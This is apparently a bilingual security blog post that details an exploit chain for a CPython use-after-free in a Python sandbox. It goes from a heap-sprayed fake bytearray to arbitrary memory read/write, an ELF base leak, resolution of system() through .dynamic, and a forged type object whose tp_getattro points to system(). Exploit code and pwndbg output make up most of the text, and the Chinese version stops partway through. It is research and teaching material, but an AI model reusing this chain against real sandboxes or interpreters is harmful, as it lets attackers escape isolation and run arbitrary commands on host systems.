bebop404

CPython UAF: Exploit Chain Dev from UAF Trigger to RCE (EN/中文)

Building a full interpreter-level exploit chain from a CPython use-after-free to remote code execution, with pwndbg output at each step.

EN

Author: Ivan

Recently, I discovered and exploited a CPython use-after-free vulnerability inside coze-studio's legacy Python sandbox, building an interpreter-level exploit chain from memory corruption to code execution.

In this post, I break down each step that follows the UAF trigger, with real pwndbg debugging output at every stage.

Environment: Ubuntu 24.04 x86_64 · python3-dbg 3.12.3 · gdb 15 + pwndbg

The root cause of the vulnerability is covered in a separate article. This article assumes the following prerequisites: the re-entrant lifetime mismatch has been triggered, the UAF conditions are met, and we are entering the exploitation development phase.


Overview: Exploit Chain Structure

flowchart LR
    UAF --> Primitive --> Leak --> Resolve --> Hijack --> Exec
    UAF[Use After Free]
    Primitive[Arbitrary Memory Access]
    Leak[Binary Base Disclosure]
    Resolve[Dynamic Symbol Resolution]
    Hijack[Function Pointer Hijack]
    Exec[Interpreter Mediated Code Execution]

Step 1: PyByteArrayObject internal structure + fake_ba heap spray

Structure Layout (CPython 3.12)

The bytearray object header at the C layer is PyByteArrayObject, using PyObject_VAR_HEAD (three fields: ob_refcnt / ob_type / ob_size), followed by its own fields:

offset  field        description
+0x00   ob_refcnt    reference count
+0x08   ob_type      points to the bytearray type object
+0x10   ob_size      logical length (Py_SIZE)
+0x18   ob_alloc     allocated capacity in bytes
+0x20   ob_bytes     char*, physical start of the backing buffer
+0x28   ob_start     char*, logical start of the data (the pointer that indexing dereferences)
+0x30   ob_exports   number of active buffer exports

The critical fields are the two buffer pointers. When bytearray_subscript performs index access, it reads PyByteArray_AS_STRING(self)[index], i.e. *(ob_start + index). If the buffer pointers are set to NULL (0), then buf[addr] becomes *(0 + addr): a direct read/write of the virtual address addr.

fake_ba construction

The layout of fake_ba in the exploit (matching the fields above one to one):

fake_ba = (
    p64(0x123456) +                         # +0x00 ob_refcnt = fake
    p64(id(bytearray)) +                    # +0x08 ob_type   = real bytearray type
    p64(2**63 - 1) +                        # +0x10 ob_size   = MAX
    p64(2**63 - 1) +                        # +0x18 ob_alloc  = MAX
    p64(0) * 3                              # +0x20 ob_bytes = NULL, +0x28 ob_start = NULL, +0x30 ob_exports = 0
)

The heap spray writes this template into the freed chunk. Python then hands this memory back out as a bytearray object: this is mem, the object captured by default_handler in the exploit.

I simulated this injection process in pwndbg using ctypes, pausing at BP1 (pre-injection) and BP2 (post-injection) to directly inspect PyByteArrayObject's memory:

[Stage 1]  PyByteArrayObject @ 0x7ffff74e3fb0
================================================================
  BEFORE corruption:
  +0x00  ob_refcnt  = 0x0000000000000001  (1)
  +0x08  ob_type    = 0x0000000000a8cd80
  +0x10  ob_size    = 0x0000000000000100  (256  = logical len)
  +0x18  ob_alloc   = 0x0000000000000101  (257  = capacity)
  +0x20  ob_bytes   = 0x00007ffff760b880  (backing buffer ptr)
  +0x28  ob_start   = 0x00007ffff760b880  (data start ptr)
  +0x30  ob_exports = 0x0000000000000000

  AFTER  corruption (fake_ba sprayed into freed slot):
  +0x00  ob_refcnt  = 0x0000000000123456  (fake, no GC)
  +0x10  ob_size    = 0x7fffffffffffffff  (= 2^63-1, all bounds pass)
  +0x18  ob_alloc   = 0x7fffffffffffffff  (= 2^63-1)
  +0x28  ob_start   = 0x0000000000000000  (NULL → buf[addr] = *(0+addr) = *addr)
  len(buf) = 9223372036854775807  ← Python sees a 9223372036854775807-byte window

ob_size = 0x7fffffffffffffff: len(buf) returns 2^63-1, so every non-negative index below that value passes the i >= Py_SIZE(self) bounds check. ob_start = NULL: bytearray_subscript computes ob_start + i = 0 + addr = addr, so the index is used directly as a virtual address.
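To make the offsets concrete, here is a minimal sketch that packs the seven header qwords with struct and decodes them back by name. It only manipulates an ordinary bytes value. The field names follow CPython 3.12's PyByteArrayObject on a 64-bit build; the helper name decode_header and the placeholder type address 0xa8cd80 (taken from the Stage 1 output) are assumptions made for illustration.

```python
import struct

# Field order of PyByteArrayObject on 64-bit CPython 3.12 (7 qwords, 56 bytes).
FIELDS = ("ob_refcnt", "ob_type", "ob_size", "ob_alloc",
          "ob_bytes", "ob_start", "ob_exports")

def decode_header(raw: bytes) -> dict:
    """Hypothetical helper: map a 56-byte header to {field: value}."""
    values = struct.unpack("<7Q", raw)      # little-endian, unsigned 64-bit
    return dict(zip(FIELDS, values))

# Same values as the fake_ba template; 0xa8cd80 stands in for id(bytearray).
template = struct.pack("<7Q", 0x123456, 0xa8cd80, 2**63 - 1, 2**63 - 1, 0, 0, 0)
header = decode_header(template)

for index, name in enumerate(FIELDS):
    print(f"+0x{index * 8:02x}  {name:<10} = 0x{header[name]:016x}")
```

Printing the decoded header this way gives the same offset/value listing as the Stage 1 dump, which is a quick way to check a template against the structure definition before comparing it with debugger output.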

pwndbg at BP2 (heap spray completed, paused at os.kill system call return point):

─────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────
 RAX  0
 RBX  5
 RCX  0x7ffff7c4553b (kill+11) ◂— cmp rax, -0xfff
 RDI  0x11c82
 RSI  5
 R15  0x6a8bcf (os_kill) ◂— endbr64
 RIP  0x7ffff7c4553b (kill+11) ◂— cmp rax, -0xfff
──────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────
 ► 0x7ffff7c4553b <kill+11>            cmp    rax, -0xfff
   0x7ffff7c45543 <kill+19>            ret
    ↓
   0x6a8ba2       <os_kill_impl+52>    cmp    eax, -1
─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
 ► 0   0x7ffff7c4553b kill+11
   1         0x6a8ba2 os_kill_impl+52
   2         0x6a8c0f os_kill+64
   3         0x4ff074 cfunction_vectorcall_FASTCALL+103
   4         0x5aa892 _PyEval_EvalFrameDefault+56003

Step 2: Arbitrary read/write primitive

After the window opens, the r64/w64 implementation is straightforward:

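# mem is the corrupted bytearray from Step 1: every index is an absolute address.
read = lambda addr, sz: bytes(mem[addr + i] for i in range(sz))
r32  = lambda addr: int.from_bytes(read(addr, 4), 'little')   # used in Step 4
r64  = lambda addr: int.from_bytes(read(addr, 8), 'little')
w64  = lambda addr, val: [mem.__setitem__(addr + i, (val >> 8*i) & 0xff) for i in range(8)]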

mem[addr] calls bytearray_subscript, which at the C layer dereferences the (now NULL) data pointer plus the index: *(0 + addr) = *(addr). The write path mem.__setitem__(addr, byte) goes through bytearray_ass_subscript and likewise writes directly to address addr.
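The byte-by-byte little-endian encoding behind r64/w64 can be checked in isolation. The sketch below runs the same shift-and-mask logic against an ordinary 16-byte bytearray, so indexes are plain offsets rather than addresses; the names buf, write_u64 and read_u64 are made up for this example.

```python
# An ordinary 16-byte bytearray stands in for memory; offsets are plain indexes.
buf = bytearray(16)

def write_u64(offset: int, value: int) -> None:
    """Store a 64-bit value one byte at a time, least significant byte first."""
    for i in range(8):
        buf[offset + i] = (value >> (8 * i)) & 0xFF

def read_u64(offset: int) -> int:
    """Reassemble eight single-byte reads into a little-endian integer."""
    return int.from_bytes(bytes(buf[offset + i] for i in range(8)), "little")

write_u64(8, 0xDEADBEEFCAFEBABE)
print(buf[8:16].hex())      # bebafecaefbeadde (bytes stored in reverse order)
print(hex(read_u64(8)))     # 0xdeadbeefcafebabe
```

A round trip like this is the same self-consistency check as the canary test that follows, just without the corrupted object.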

Canary Round-Trip Verification

Canary write test in pwndbg:

[Stage 2]  Arb R/W self-consistency
================================================================
  target: canary_holder @ 0x7ffff74e3ec0
  r64(0x7ffff74e3ec0)  BEFORE write = 0x0000000000000001
  ctypes direct          BEFORE write = 0x0000000000000001
 
  w64(0x7ffff74e3ec0, 0xdeadbeefcafebabe)
  r64(0x7ffff74e3ec0)  AFTER  write = 0xdeadbeefcafebabe
  ctypes direct          AFTER  write = 0xdeadbeefcafebabe
  [PASS] read-back == 0xdeadbeefcafebabe

Both paths (r64 via mem window vs ctypes direct mapping) read the same value, passing the primitive verification.


Step 3: Leak ELF base address

Exploit the tp_dealloc pointer

id(int) returns the address of PyLong_Type in the static data segment. Within the PyTypeObject structure, tp_dealloc (the destructor pointer) resides at +0x30:

PyTypeObject offset layout:
  +0x00  ob_refcnt
  +0x08  ob_type
  +0x10  ob_size
  +0x18  tp_name         (char*)
  +0x20  tp_basicsize
  +0x28  tp_itemsize
  +0x30  tp_dealloc      <- points to a function inside the Python 3 binary
  +0x38  tp_vectorcall_offset
  ...
  +0x90  tp_getattro     <- later hijack target

r64(id(int) + 0x30) reads PyLong_Type.tp_dealloc, a function pointer into the python3 ELF image. Page-align it (>> 12 << 12), then walk toward lower addresses one page at a time until the \x7fELF magic appears; that page holds the ELF header, i.e. the image base.

leak = (r64(id(int) + 0x30) >> 12) << 12
while read(leak, 4) != b"\x7fELF":
    leak -= 0x1000
elf_base = leak
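The alignment and downward scan are easy to verify with the numbers from the Stage 3 output below. This sketch replaces the real read primitive with a stand-in function (fake_read, a made-up name) that returns the ELF magic only at 0x400000, so it runs on its own without touching process memory.

```python
PAGE = 0x1000
ELF_BASE = 0x400000        # load address shown in the Stage 3 output
leaked_ptr = 0x4e1d11      # tp_dealloc value shown in the Stage 3 output

def fake_read(addr: int, size: int) -> bytes:
    """Stand-in for read(): only the page at ELF_BASE starts with the magic."""
    return b"\x7fELF"[:size] if addr == ELF_BASE else b"\x00" * size

aligned = (leaked_ptr >> 12) << 12     # clear the low 12 bits
page, steps = aligned, 0
while fake_read(page, 4) != b"\x7fELF":
    page -= PAGE                       # move one page toward lower addresses
    steps += 1

print(hex(aligned), hex(page), steps)  # 0x4e1000 0x400000 225
```

With these values the loop needs 225 single-page steps, since (0x4e1000 - 0x400000) / 0x1000 = 0xe1.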

pwndbg:

[Stage 3]  ELF base leak
================================================================
  id(int)  =  PyLong_Type @ 0x9a0a20
  r64(PyLong_Type + 0x30)  =  0x4e1d11  (tp_dealloc)
  page-aligned             =  0x4e1000
 
  ELF header @ 0x400000
    magic     = b'\x7fELF'
    e_type    = 0x0002   (2=ET_EXEC, 3=ET_DYN)
    e_machine = 0x003e   (62=EM_X86_64)
    e_entry   = 0x422066
    e_phoff   = 0x40   (14 entries × 56 bytes)

Step 4: Parse system() from .dynamic

The ELF header contains the program header table. Traverse the PHDRs to find an entry of type PT_DYNAMIC (2), whose p_vaddr points to the .dynamic section.
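As a rough illustration of the PHDR walk, the sketch below builds a tiny synthetic image (one ELF header plus two program headers) and locates PT_DYNAMIC with struct. The header values mirror the Stage 3 output; the two program headers and the helper name find_dynamic are invented for this example, and a real image would have 14 entries as shown above.

```python
import struct

EHDR = struct.Struct("<16sHHIQQQIHHHHHH")   # Elf64_Ehdr, 64 bytes
PHDR = struct.Struct("<IIQQQQQQ")           # Elf64_Phdr, 56 bytes
PT_LOAD, PT_DYNAMIC = 1, 2

# Synthetic image: e_type=2, e_machine=62, e_entry=0x422066, e_phoff=0x40,
# e_phentsize=56, e_phnum=2. The program headers themselves are made up.
ident = b"\x7fELF\x02\x01\x01" + b"\x00" * 9
ehdr = EHDR.pack(ident, 2, 62, 1, 0x422066, 0x40, 0, 0, 64, 56, 2, 0, 0, 0)
phdrs = (PHDR.pack(PT_LOAD, 5, 0, 0x400000, 0x400000, 0x1000, 0x1000, 0x1000)
         + PHDR.pack(PT_DYNAMIC, 6, 0, 0xa8add8, 0xa8add8, 0x200, 0x200, 8))
image = ehdr + phdrs

def find_dynamic(image: bytes) -> int:
    """Return p_vaddr of the first PT_DYNAMIC program header, or raise."""
    fields = EHDR.unpack_from(image, 0)
    e_phoff, e_phentsize, e_phnum = fields[5], fields[9], fields[10]
    for i in range(e_phnum):
        entry = PHDR.unpack_from(image, e_phoff + i * e_phentsize)
        p_type, p_vaddr = entry[0], entry[3]
        if p_type == PT_DYNAMIC:
            return p_vaddr
    raise LookupError("no PT_DYNAMIC segment")

print(hex(find_dynamic(image)))     # 0xa8add8
```

In the exploit the same fields are fetched through the read primitive at elf_base instead of being sliced out of a bytes object.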

.dynamic contains a series of {d_tag, d_val} pairs (8 bytes per field, 16 bytes per entry), terminated by d_tag == 0 (DT_NULL). Four tags matter here:

tag               value   meaning
DT_JMPREL (23)    d_val   start address of rela.plt (relocation table for imported functions)
DT_PLTRELSZ (2)   d_val   total size of rela.plt in bytes
DT_SYMTAB (6)     d_val   address of .dynsym (symbol table)
DT_STRTAB (5)     d_val   address of .dynstr (symbol-name string table)
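A small sketch of the .dynamic walk, run against a synthetic table rather than live memory: the tag values are the standard ELF constants, the d_val numbers come from the Stage 4 output further down, and the size 501 * 24 is derived from the "501 entries" figure there. The helper name parse_dynamic is an assumption for this example.

```python
import struct

DT_NULL, DT_PLTRELSZ, DT_STRTAB, DT_SYMTAB, DT_JMPREL = 0, 2, 5, 6, 23

# Synthetic .dynamic built from the Stage 4 values (501 entries * 24 bytes each).
entries = [(DT_STRTAB, 0x410f28), (DT_SYMTAB, 0x403818),
           (DT_PLTRELSZ, 501 * 24), (DT_JMPREL, 0x41c8d8), (DT_NULL, 0)]
dynamic = b"".join(struct.pack("<QQ", tag, val) for tag, val in entries)

def parse_dynamic(blob: bytes) -> dict:
    """Collect {d_tag: d_val} from 16-byte entries, stopping at DT_NULL."""
    tags = {}
    for d_tag, d_val in struct.iter_unpack("<QQ", blob):
        if d_tag == DT_NULL:
            break
        tags[d_tag] = d_val
    return tags

tags = parse_dynamic(dynamic)
print(hex(tags[DT_JMPREL]), tags[DT_PLTRELSZ] // 24)   # 0x41c8d8 501
```

Dividing DT_PLTRELSZ by the 24-byte entry size gives the number of rela.plt entries to iterate over.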

Each Elf64_Rela entry occupies 24 bytes:

+0   r_offset  (8)  -> corresponding GOT slot address
+8   r_info    (8)  -> upper 32 bits: symbol table index; lower 32 bits: relocation type
+16  r_addend  (8)

Look up the symbol name by reading .dynsym[sym_idx].st_name and using it as an offset into .dynstr. Once "system" is found, read the GOT slot at r_offset to obtain the runtime address of system() (assuming the slot has already been resolved).
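The r_info split and the name lookup can be tried on hand-built tables. Everything below is synthetic: the two-symbol .dynsym/.dynstr pair and the single relocation are made up for this sketch, with only the r_offset value borrowed from the Stage 4 output.

```python
import struct

R_X86_64_JUMP_SLOT = 7
SYM_SIZE = 24                   # sizeof(Elf64_Sym); st_name is its first 4 bytes

# Synthetic tables: string offsets 1 and 6 point at "puts" and "system".
dynstr = b"\x00puts\x00system\x00"
dynsym = (struct.pack("<IBBHQQ", 0, 0, 0, 0, 0, 0)         # index 0: null symbol
          + struct.pack("<IBBHQQ", 1, 0x12, 0, 0, 0, 0)    # index 1: "puts"
          + struct.pack("<IBBHQQ", 6, 0x12, 0, 0, 0, 0))   # index 2: "system"
rela = struct.pack("<QQq", 0xa8b350, (2 << 32) | R_X86_64_JUMP_SLOT, 0)

r_offset, r_info, _addend = struct.unpack("<QQq", rela)
sym_idx = r_info >> 32               # upper 32 bits: symbol table index
rel_type = r_info & 0xFFFFFFFF       # lower 32 bits: relocation type
(st_name,) = struct.unpack_from("<I", dynsym, sym_idx * SYM_SIZE)
name = dynstr[st_name:dynstr.index(b"\x00", st_name)]

print(sym_idx, rel_type, name, hex(r_offset))   # 2 7 b'system' 0xa8b350
```

Searching for the terminating NUL, as done here, avoids the fixed 32-byte read and split used in the loop, which would truncate longer symbol names.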

for i in range(dt_pltrelsz // 24):
    rela      = dt_jmprel + i * 24
    r_offset  = r64(rela)           # GOT slot address
    r_info    = r64(rela + 8)
    sym_idx   = r_info >> 32
    st_name   = r32(dt_symtab + sym_idx * 24)
    name      = read(dt_strtab + st_name, 32).split(b"\x00")[0]
    if name == b"system":
        system = r64(r_offset)      # dereference GOT → real system() address
        break

pwndbg:

[Stage 4]  Resolving system() via .dynamic
================================================================
  PT_DYNAMIC: phdr[6]  p_vaddr=0xa8add8  filesz=0x200
  .dynamic resolved @ 0xa8add8
 
  DT_JMPREL  (rela.plt)  = 0x41c8d8   (501 entries)
  DT_SYMTAB              = 0x403818
  DT_STRTAB              = 0x410f28
 
  Found 'system' in rela.plt[106]:
    r_offset  (GOT entry addr)  = 0xa8b350
    sym_idx                      = 106
    GOT[r_offset] (resolved addr)= 0x7ffff7c58750
    first 8 bytes of system()   = f30f1efa4885ff74

The bytes f3 0f 1e fa decode to endbr64, the first instruction of libc's system() on CET-enabled builds. 0x7ffff7c58750 lies inside libc rather than in a PLT stub, which confirms that the GOT slot has already been resolved.
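The prologue check is a plain byte comparison. A minimal sketch, using the eight bytes printed in the Stage 4 output; the variable names are made up for this example:

```python
# First eight bytes of system() as printed in the Stage 4 output.
prologue = bytes.fromhex("f30f1efa4885ff74")

ENDBR64 = b"\xf3\x0f\x1e\xfa"        # encoding of the endbr64 instruction
TEST_RDI_RDI = b"\x48\x85\xff"       # encoding of test rdi, rdi

starts_with_endbr64 = prologue.startswith(ENDBR64)
followed_by_test = prologue[4:7] == TEST_RDI_RDI

print(starts_with_endbr64, followed_by_test)   # True True
```

The test rdi, rdi that follows is the NULL-argument check at the top of system(), which is a second hint that the resolved address is the real function entry.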


Step 5: Forge PyTypeObject

What is tp_getattro?

When Python executes obj.attr, the interpreter's execution path is:

LOAD_ATTR bytecode
  -> _PyObject_GetMethod(obj, "attr")
    -> PyObject_GetAttr(obj, name)
      -> f = Py_TYPE(obj)->tp_getattro    <- read func ptr of ob_type
        -> f(obj, name)                   <- indirect call

tp_getattro is located at offset +0x90 within PyTypeObject (the 24 bytes of PyObject_VAR_HEAD plus the fields declared before it). It is a getattrofunc pointer with the prototype:

typedef PyObject *(*getattrofunc)(PyObject *obj, PyObject *name);

If this pointer is replaced with system, the interpreter calls system(obj, name) on attribute access. Under the System V x86-64 calling convention the first argument is passed in RDI, and system(const char *command) only reads RDI, so the effect is system(obj): the bytes at obj's address are interpreted as the command string.
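The +0x90 figure can be reproduced by counting members. The sketch below lists the leading PyTypeObject members in declaration order for 64-bit CPython 3.12, all of which are pointer-sized, and derives each offset from its position; the names LEADING_FIELDS and offsets are chosen for this example.

```python
# Leading members of PyTypeObject on 64-bit CPython 3.12, in declaration order.
# Every member listed here occupies 8 bytes.
LEADING_FIELDS = [
    "ob_refcnt", "ob_type", "ob_size",              # PyObject_VAR_HEAD
    "tp_name", "tp_basicsize", "tp_itemsize",
    "tp_dealloc", "tp_vectorcall_offset", "tp_getattr", "tp_setattr",
    "tp_as_async", "tp_repr", "tp_as_number", "tp_as_sequence",
    "tp_as_mapping", "tp_hash", "tp_call", "tp_str", "tp_getattro",
]

offsets = {name: index * 8 for index, name in enumerate(LEADING_FIELDS)}
print(hex(offsets["tp_dealloc"]), hex(offsets["tp_getattro"]))   # 0x30 0x90
```

The same table gives the +0x30 offset of tp_dealloc used for the leak in Step 3.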

Constructing fake_type

fake_type = flat(
    0x1000,                              # +0x00  ob_refcnt (high value so it is never deallocated)
    id(type(int)),                       # +0x08  ob_type (metaclass, keep it "valid")
    b"\x00" * 0x28,                      # +0x10 ~ +0x37  padding (covers ob_size / tp_name /
                                         #                 tp_basicsize / tp_itemsize / tp_dealloc)
    system,                              # +0x38  first slot filled with system()
) + p64(system) * 52                     # 52 more slots, +0x40 through +0x1D8 (buffer ends at +0x1E0)
                                         # covers tp_getattro (+0x90) and every other slot in range

Keep this buffer alive in a bytes object, then compute fake_type_addr = id(bytes(fake_type)) + 32 (skipping the 32-byte PyBytesObject header so the address points at the content area).
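Both size figures can be sanity-checked with ordinary Python. This sketch assumes a standard 64-bit CPython build, where sys.getsizeof(b"") counts the PyBytesObject header plus the one trailing NUL byte every bytes object carries; the variable names are made up, and the header figure may differ on other builds.

```python
import sys

# Header size of a bytes object: total size of b"" minus its trailing NUL byte.
# Expected to be 32 on a standard 64-bit CPython build (an assumption here).
header_size = sys.getsizeof(b"") - 1

# Size of the fake_type buffer: 0x38 bytes of header and padding,
# then one pointer slot from flat() plus 52 from the multiplication.
fake_type_size = 0x38 + 8 * (1 + 52)
last_slot = fake_type_size - 8

print(header_size, hex(fake_type_size), hex(last_slot))
```

The last filled slot starts at +0x1D8, so the tp_getattro slot at +0x90 sits well inside the filled range.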

pwndbg:

[Stage 5]  Fake PyTypeObject
================================================================
  fake_type_bytes (PyBytesObject) @ 0xd8be40
  content area (our fake type)    @ 0xd8be60
  int metaclass                   @ 0xaa6b60
 
  Slot inspection (first 20 qwords from fake_type_addr):
    +0x00:  0x0000000000001000  ← ob_refcnt
    +0x08:  0x0000000000aa6b60  ← ob_type (metaclass)
    +0x10:  0x0000000000000000
    +0x18:  0x0000000000000000
    +0x20:  0x0000000000000000
    +0x28:  0x0000000000000000
    +0x30:  0x0000000000000000
    +0x38:  0x00007ffff7c58750  ← tp_vectorcall_offset (also system)
    +0x40:  0x00007ffff7c58750  ← system() [+0x40]
    +0x48:  0x00007ffff7c58750  ← system() [+0x48]
    +0x50:  0x00007ffff7c58750  ← system() [+0x50]
    +0x58:  0x00007ffff7c58750  ← system() [+0x58]
    +0x60:  0x00007ffff7c58750  ← system() [+0x60]
    +0x68:  0x00007ffff7c58750  ← system() [+0x68]
    +0x70:  0x00007ffff7c58750  ← system() [+0x70]
    +0x78:  0x00007ffff7c58750  ← system() [+0x78]
    +0x80:  0x00007ffff7c58750  ← system() [+0x80]
    +0x88:  0x00007ffff7c58750  ← system() [+0x88]
    +0x90:  0x00007ffff7c58750  ← tp_getattro  *** system() ***
    +0x98:  0x00007ffff7c58750  ← system() [+0x98]

pwndbg's x/20gx fake_type_addr verification:

(gdb) x/20gx 0xd8be60
0xd8be60:  0x0000000000001000  0x0000000000aa6b60
0xd8be70:  0x0000000000000000  0x0000000000000000
0xd8be80:  0x0000000000000000  0x0000000000000000
0xd8be90:  0x0000000000000000  0x00007ffff7c58750
0xd8bea0:  0x00007ffff7c58750  0x00007ffff7c58750
0xd8beb0:  0x00007ffff7c58750  0x00007ffff7c58750
0xd8bec0:  0x00007ffff7c58750  0x00007ffff7c58750
0xd8bed0:  0x00007ffff7c58750  0x00007ffff7c58750
0xd8bee0:  0x00007ffff7c58750  0x00007ffff7c58750
0xd8bef0:  0x00007ffff7c58750  0x00007ffff7c58750

0xd8bef0 = 0xd8be60 + 0x90 — tp_getattro slot — indeed points to 0x7ffff7c58750 = system().


Step 6: INCREF trick + fake_obj + RCE

Question: Where does the argument for system() come from?

When tp_getattro(obj, name) is called, obj resides in RDI. system(const char *command) receives RDI as the command string pointer. Thus system() executes the string at obj's address.

We need obj (fake_obj_addr) to point to a fake Python object whose first bytes at the C layer are the shell command, i.e. the 8 bytes of the ob_refcnt field must hold "id\x00..." (or another short command).

The ingenuity of the INCREF trick

Storing "id\x00..." directly in ob_refcnt does not work: Python's BINARY_SUBSCR (list index access) executes Py_INCREF(item) before returning the element, which adds 1 to ob_refcnt and would turn "id" into "jd".

The fix is to exploit this behavior: store the first byte of the command decremented by one. The ASCII code for 'i' is 105; decrementing yields 104 = 'h'. After INCREF, 'h' → 'i', and the command is valid.

# ob_refcnt initially b"hd\x00\x00\x00\x00\x00\x00" (= "id"[0]-1 + "d")
# BINARY_SUBSCR triggers Py_INCREF: ob_refcnt[0] from 0x68('h') to 0x69('i')
# system(fake_obj_addr) sees string: "id\x00..." = "id"
cmd = bytes([ord('i') - 1]) + b"d\x00\x00\x00\x00\x00\x00"   # b"hd\x00..."
 
fake_obj = cmd + p64(fake_type_addr) + b"\x00" * 0x100
#  [0..7]   ob_refcnt = b"hd\x00..."  <- After Py_INCREF, turns to b"id\x00..."
#  [8..15]  ob_type   = fake_type_addr
#  [16..]   padding
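The arithmetic behind the trick is just an integer increment on a little-endian field. A minimal sketch on plain bytes, with variable names chosen for this example:

```python
command = b"id"

# Pad to the 8-byte width of ob_refcnt and lower the first byte by one.
stored = bytes([command[0] - 1]) + command[1:].ljust(7, b"\x00")

refcnt = int.from_bytes(stored, "little")          # the field as an integer
after_incref = (refcnt + 1).to_bytes(8, "little")  # what Py_INCREF leaves behind

print(stored, hex(refcnt), after_incref)
# b'hd\x00\x00\x00\x00\x00\x00' 0x6468 b'id\x00\x00\x00\x00\x00\x00'
```

Because the field is little-endian, adding 1 to the integer changes only the first byte in memory, which is why the decrement is applied to the first character of the command.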

Overwriting the ob_item pointer

Internal structure of list objects:

PyListObject:
  +0x00  ob_refcnt
  +0x08  ob_type
  +0x10  ob_size          (len(list))
  +0x18  ob_item          (PyObject **, point to payload array)
  +0x20  allocated

r64(id(payload) + 0x18) reads ob_item (the address of the slot that holds payload[0]), then w64(ob_item_addr, fake_obj_addr) redirects payload[0] to our fake_obj:

payload = [None]
w64(r64(id(payload) + 0x18), fake_obj_addr)   # overwrite ob_item[0]

fake_obj before INCREF:

[Stage 6]  INCREF trick + RCE
================================================================
  fake_obj_bytes @ 0x7ffff74acac0
  fake_obj_addr  @ 0x7ffff74acae0
 
  ob_refcnt bytes BEFORE INCREF:
    raw  : 6864000000000000  (b'hd\x00\x00\x00\x00\x00\x00')
    [0]  : 0x68 = ord('h')  <- NOT 'i' yet
 
  ob_type at +0x08:
    r64(fake_obj_addr+0x08) = 0xd8be60  == fake_type_addr: True
 
  After BINARY_SUBSCR Py_INCREF, ob_refcnt[0] += 1:
    0x68 → 0x69 = ord('i')  ← 'i' appears
    system(fake_obj_addr) sees string: 'id'

pwndbg stopped at the PyObject_GetAttr breakpoint (triggered by payload[0].pwned):

─────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────
*RDI  0x7ffff74acae0 ◂— 0x6469 /* 'id' */     ← fake_obj became 'id' after INCREF
*RSI  0x7ffff7505990 ◂— 0xffffffff             ← PyUnicode "pwned"
 RIP  0x504607 (PyObject_GetAttr) ◂— endbr64
──────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────
 ► 0x504607 <PyObject_GetAttr>       endbr64
   0x504616 <PyObject_GetAttr+15>    mov    r14, qword ptr [rdi + 8]
                                     R14, [0x7ffff74acae8] => 0xd8be60 ◂— 0x1000
                                     ↑ reads ob_type = fake_type_addr
   0x50461a <PyObject_GetAttr+19>    mov    rax, qword ptr [rsi + 8]
─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
 ► 0     0x504607 PyObject_GetAttr
   1     0x5a5e02 _PyEval_EvalFrameDefault+36915
   2     0x5b0226 _PyEval_EvalFrame+29

In pwndbg, RDI = 0x7ffff74acae0. pwndbg auto-dereferences to display ◂— 0x6469 /* 'id' */ — precisely the ob_refcnt value after INCREF, little-endian 0x6469 = b"id".

Next, at PyObject_GetAttr+15: mov r14, [rdi+8] loads ob_type into R14 (= 0xd8be60 = fake_type_addr). Then at +50: call rax, where RAX = fake_type->tp_getattro = 0x7ffff7c58750 = system().

GDB output confirms tp_getattro dereferencing and execution:

[pwndbg] Inside PyObject_GetAttr — about to dispatch via ob_type->tp_getattro:
 
  fake_obj  @ 0x7ffff74acae0
  ob_type   @ 0xd8be60  (our fake PyTypeObject)
  tp_getattro (+0x90) = 0x7ffff7c58750  ← will be called as system(fake_obj)
  *fake_obj (command) = b'id\x00\x00\x00\x00\x00\x00'  ('id')

Raw memory of fake_obj (pwndbg x/4gx):

(gdb) x/4gx 0x7ffff74acae0
0x7ffff74acae0:  0x0000000000006469  0x0000000000d8be60
0x7ffff74acaf0:  0x0000000000000000  0x0000000000000000
  • 0x6469 = little-endian b"id" ← INCREF modified first byte
  • 0xd8be60 = fake_type_addr ← ob_type points to our fake type object

Execution result:

uid=1000(ivan) gid=1000(ivan) groups=1000(ivan),27(sudo)

Wrap-up: Complete exploit flow review

From UAF trigger to command execution, no shellcode, no ROP — entirely leveraging the interpreter's own C function pointer dispatch:

  1. fake_ba heap spray sets a bytearray's buffer pointer to NULL and ob_size to MAX → a window over the entire virtual address space opens
  2. r64/w64 enables arbitrary read/write via bytearray index access
  3. ELF base derived by tracing back from PyLong_Type.tp_dealloc pointer
  4. system() parsed at runtime via ELF's PT_DYNAMIC → rela.plt
  5. fake PyTypeObject sets tp_getattro to system()
  6. Overwrite ob_item to make payload[0] point to a fake Python object, whose ob_refcnt stores the command string
  7. INCREF trick: Exploits Python's BINARY_SUBSCR auto-INCREF to change command's first byte from 'h' (0x68) to 'i' (0x69)
  8. payload[0].pwned triggers PyObject_GetAttr → tp_getattro(obj) → system("id")

(End)


CN

作者:Ivan

最近在研究 Coze Studio 的 legacy Python 沙箱时,发现了一个 CPython 的 use-after-free 漏洞。顺着这个问题往下挖,最终在本地环境里把整条从内存破坏到代码执行的利用链跑通了。

本文为完整版。我将 UAF 触发后的每一步都拆解开来,配上在 pwndbg 中的真实调试输出。

环境:Ubuntu 24.04 x86_64 · python3-dbg 3.12.3 · gdb 15 + pwndbg

漏洞根因另文。本文默认前提:re-entrant lifetime mismatch 已触发,UAF 条件已成立,我们进入利用开发流程。


总览:链路结构

flowchart LR
    UAF --> RW --> Leak --> Resolve --> Hijack --> Exec
    UAF[UAF 触发]
    RW[任意读写]
    Leak[泄露 ELF]
    Resolve[解析 system]
    Hijack[劫持 tp_getattro]
    Exec[system 执行]

第一步:PyByteArrayObject 内部结构 + fake_ba 堆喷

结构布局(CPython 3.12)

bytearray 在 C 层的对象头是 PyByteArrayObject,使用 PyObject_VAR_HEAD(三个字段:ob_refcnt / ob_type / ob_size),然后是自己的字段:

offset  field        说明
+0x00   ob_refcnt    引用计数
+0x08   ob_type      指向 bytearray 类型对象
+0x10   ob_size      逻辑长度(Py_SIZE)
+0x18   ob_alloc     已分配容量(字节)
+0x20   ob_bytes     char*,底层缓冲区的物理起始指针
+0x28   ob_start     char*,数据的逻辑起始指针(下标访问解引用的就是它)
+0x30   ob_exports   当前缓冲区导出计数

关键是这两个缓冲区指针。bytearray_subscript 做下标访问时读取的是 PyByteArray_AS_STRING(self)[index],即 *(ob_start + index)。如果我们把缓冲区指针改成 NULL(0),那么 buf[addr] 就变成了 *(0 + addr),即对虚拟地址 addr 的直接读写。

fake_ba 构造

exploit 中 fake_ba 的布局(精确对应上述字段):

fake_ba = (
    p64(0x123456) +                          # +0x00 ob_refcnt = 假值(防 GC)
